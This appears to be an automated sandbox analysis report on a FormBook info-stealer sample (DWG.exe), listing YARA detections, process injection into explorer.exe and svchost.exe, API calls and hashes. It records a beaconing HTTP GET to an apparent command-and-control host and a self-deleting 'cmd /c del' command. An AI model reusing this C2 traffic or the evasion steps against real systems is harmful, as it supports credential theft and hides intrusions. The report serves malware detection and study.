                                    Timestamp | kBytes transferred | Direction | Data
                                    Oct 28, 2021 07:41:10.336775064 CEST | 6010 | OUT | GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1
                                    Host: www.theravewizards.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Code Manipulations

                                    Statistics

                                    CPU Usage


                                    Memory Usage


                                    High Level Behavior Distribution


                                    Behavior


                                    System Behavior

                                    General

                                    Start time: 07:39:06
                                    Start date: 28/10/2021
                                    Path: C:\Users\user\Desktop\DWG.exe
                                    Wow64 process (32bit): true
                                    Commandline: 'C:\Users\user\Desktop\DWG.exe'
                                    Imagebase: 0x400000
                                    File size: 626688 bytes
                                    MD5 hash: FF882802D113ED02FA070C496F89D797
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation: low

                                    General

                                    Start time: 07:39:25
                                    Start date: 28/10/2021
                                    Path: C:\Users\user\Desktop\DWG.exe
                                    Wow64 process (32bit): true
                                    Commandline: C:\Users\user\Desktop\DWG.exe
                                    Imagebase: 0x400000
                                    File size: 626688 bytes
                                    MD5 hash: FF882802D113ED02FA070C496F89D797
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation: low

                                    General

                                    Start time: 07:39:27
                                    Start date: 28/10/2021
                                    Path: C:\Windows\explorer.exe
                                    Wow64 process (32bit): false
                                    Commandline: C:\Windows\Explorer.EXE
                                    Imagebase: 0x7ff720ea0000
                                    File size: 3933184 bytes
                                    MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges: false
                                    Has administrator privileges: false
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:07:39:46
                                    Start date:28/10/2021
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                    Imagebase:0x280000
                                    File size:44520 bytes
                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:07:39:50
                                    Start date:28/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\DWG.exe'
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:07:39:51
                                    Start date:28/10/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis


                                      Executed Functions

                                      APIs
                                      • VirtualProtect.KERNELBASE(004569A8,00008000,00000040,?), ref: 00411C7C
                                      • glGenTextures.OPENGL32(00000001,?), ref: 00411CAE
                                      • glBindTexture.OPENGL32(00000DE1,?), ref: 00411CC0
                                      • glTexParameteri.OPENGL32(00000DE1,00002801,00002601), ref: 00411CD5
                                      • glTexParameteri.OPENGL32(00000DE1,00002800,00002601), ref: 00411CEA
                                      • glTexParameteri.OPENGL32(00000DE1,00002802,00000000), ref: 00411CFC
                                      • glTexParameteri.OPENGL32(00000DE1,00002803,00000000), ref: 00411D0E
                                      • glTexImage2D.OPENGL32(00000DE1,00000000,00001908,000018D2,000000E9,00000000,00001908,00001401,00000000), ref: 00411D38
                                      • glBindTexture.OPENGL32(00000DE1,00000000), ref: 00411D45
                                      • glBegin.OPENGL32(00000000), ref: 00411D4D
                                      • glArrayElement.OPENGL32(00000036), ref: 00411D55
                                      • LineDDA.GDI32(0000000A,0000000D,00000085,00000086,0045B4C8,00000000), ref: 00420F28
                                        • Part of subcall function 00448223: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00448260
                                        • Part of subcall function 00448223: LoadResource.KERNEL32(?,00000000), ref: 00448268
                                        • Part of subcall function 00448223: LockResource.KERNEL32(?), ref: 00448275
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Parameteri$Resource$BindTexture$ArrayBeginElementFindImage2LineLoadLockProtectTexturesVirtual
                                      • String ID:
                                      • API String ID: 1874947323-1702606078
                                      • Opcode ID: 5d3bfe5a52da1de0717a5631573d7bda9d14d7362bd43b5e2efa125e795c9966
                                      • Instruction ID: 19b965e24c68f8e77dd423bec0d40db95f6de2d8cf51c259cc2b2df96df387d7
                                      • Opcode Fuzzy Hash: 5d3bfe5a52da1de0717a5631573d7bda9d14d7362bd43b5e2efa125e795c9966
                                      • Instruction Fuzzy Hash: CB745B1090CBEAC8DB32827C5C587CDAE611B23324F4843D9D1ED2A6D6C7B50B96DF66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                      • Instruction ID: bde56d12ca5bb9c6d770660d3a398e1d156253e6f7e2bbb1f69f1efc8eadc098
                                      • Opcode Fuzzy Hash: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                      • Instruction Fuzzy Hash: A5B22DB1D00218EFEB14DF94CC45BEEB7B5AB48305F10819EE905BB281DB789A89CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                      • Instruction ID: 3f0928541dba01ac92b8120503356443777dc11c91edacb79c44d10ad37986f2
                                      • Opcode Fuzzy Hash: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                      • Instruction Fuzzy Hash: 4A413D75A50209BFEB14CF94CC81FAEB7B5AF48700F108558FA15AB2C1D7B4AA44CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(?,80100000,00000018,?,00000000,00000080,00000007,00000001,00000060,00000000,00000000), ref: 00457A79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: @
                                      • API String ID: 823142352-2766056989
                                      • Opcode ID: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                      • Instruction ID: b52fd7ab4216ace9291fdb69c2fc9cc39b5326c748824256ac214eb508547c72
                                      • Opcode Fuzzy Hash: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                      • Instruction Fuzzy Hash: 35415C75A50208BFDB04CF94DC85FEEB7B9AF48710F208158FA04AB2D0D7B4AA05CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                      • Instruction ID: 57a13579ba11a278d2e7fa09c48eef1b7bfee6ab90226924f1fe4068834d2991
                                      • Opcode Fuzzy Hash: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                      • Instruction Fuzzy Hash: 96517270A10209EFEB14DFA4CC41FEE77B5AF48700F108529E619EB2C1E775AA45CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetVersion.KERNEL32(?,?,?,0044D2B0), ref: 0044D32C
                                      • GetProcessVersion.KERNELBASE(00000000,?,?,?,0044D2B0), ref: 0044D369
                                      • LoadCursorA.USER32 ref: 0044D397
                                      • LoadCursorA.USER32 ref: 0044D3A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CursorLoadVersion$Process
                                      • String ID:
                                      • API String ID: 2246821583-0
                                      • Opcode ID: 8778639b6834b464474c85e07c46324646b71cd104574dd48b9071a3e6428b87
                                      • Instruction ID: 02910b2bc9ab1dbca71b887cf845d1d80e8ca0c56a18376b08520561ce7e29b3
                                      • Opcode Fuzzy Hash: 8778639b6834b464474c85e07c46324646b71cd104574dd48b9071a3e6428b87
                                      • Instruction Fuzzy Hash: A31128B1A00B508FE7249F3A889462ABAE5FB48705740493FE18BC6B91D778E4408B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00458AA7
                                      • NtCreateSection.NTDLL(00000000,000F001F,00000000,00000000,00000002,01000000,?), ref: 00458ADF
                                      • NtClose.NTDLL(?,?,00000001,?,00000030,00000000,?,00000001), ref: 00458B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CloseCreateFileSectionWrite
                                      • String ID:
                                      • API String ID: 2349782792-0
                                      • Opcode ID: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                      • Instruction ID: 5efd40b3823e7c82bbe5598262c4189c1b2f68b3be001014db80e654cdd877c4
                                      • Opcode Fuzzy Hash: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                      • Instruction Fuzzy Hash: E061DAB4A00209EFDB04CF54C885BAAB7B5BF48315F14815EF815AB391CB79E985CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(00000000), ref: 0045899C
                                      • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00458A05
                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00458A17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                      • String ID:
                                      • API String ID: 3320349860-0
                                      • Opcode ID: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                      • Instruction ID: 0f8df6fcb5a946715e9477fa658ae907b84e29e6f754b46915cf54ccc20aae27
                                      • Opcode Fuzzy Hash: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                      • Instruction Fuzzy Hash: 23312971900218EBEF24CB90CC49BEEB775AB44316F24828EA519762C1CF785EC9CF16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(00000000), ref: 0045899C
                                      • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00458A05
                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00458A17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                      • String ID:
                                      • API String ID: 3320349860-0
                                      • Opcode ID: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                      • Instruction ID: 8a43374c92160f5a232f00476961667220aede0b54790bc7504df2cbc973e21b
                                      • Opcode Fuzzy Hash: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                      • Instruction Fuzzy Hash: 47211971900218EBDF24CB90CD48BEEB775AB45302F24828EA919762C1CF784EC8CF56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                      • Instruction ID: 93bfc8f8803c6ab3c5d65488bad2a655c48af14d5396daebe944a0dda7bc6f70
                                      • Opcode Fuzzy Hash: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                      • Instruction Fuzzy Hash: 59413F70A04208EFDB10CF54D844BDEBBB5BF44315F108169E905AB3C1D7B8AA89CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0045B69D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                      • Instruction ID: 61ecd58f3afe401d945d68bb22aeb896a75187722e600e7a069ffe4499fb5b07
                                      • Opcode Fuzzy Hash: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                      • Instruction Fuzzy Hash: C54131F2C00208AADF14DAA5DC52BEE76789B14306F14455BFD05A6182EB38965CCBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00007FFF,00003000,00000004), ref: 00457431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: f77cc96f017cc8017b84092f26def4058ec2b7d052b5dc15642f4a535b3c0d2d
                                      • Instruction ID: 5a01782c8915b1036d6b8120d5068adaa8798689a06163710366a6033a1bd840
                                      • Opcode Fuzzy Hash: f77cc96f017cc8017b84092f26def4058ec2b7d052b5dc15642f4a535b3c0d2d
                                      • Instruction Fuzzy Hash: F5416D74E14208EBDB04DFA4D840BDEB776EF58300F209129E519EB390E7799E05CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0003BA8C), ref: 0043BAD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
